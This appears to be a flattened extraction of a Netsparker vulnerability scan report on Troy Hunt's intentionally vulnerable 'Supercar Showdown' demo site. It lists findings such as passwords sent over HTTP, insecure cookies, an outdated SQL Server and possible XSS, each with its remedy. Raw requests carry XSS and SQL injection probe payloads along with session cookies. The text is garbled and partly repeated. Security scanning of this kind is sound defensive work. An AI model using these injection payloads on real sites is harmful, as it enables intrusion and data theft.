ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
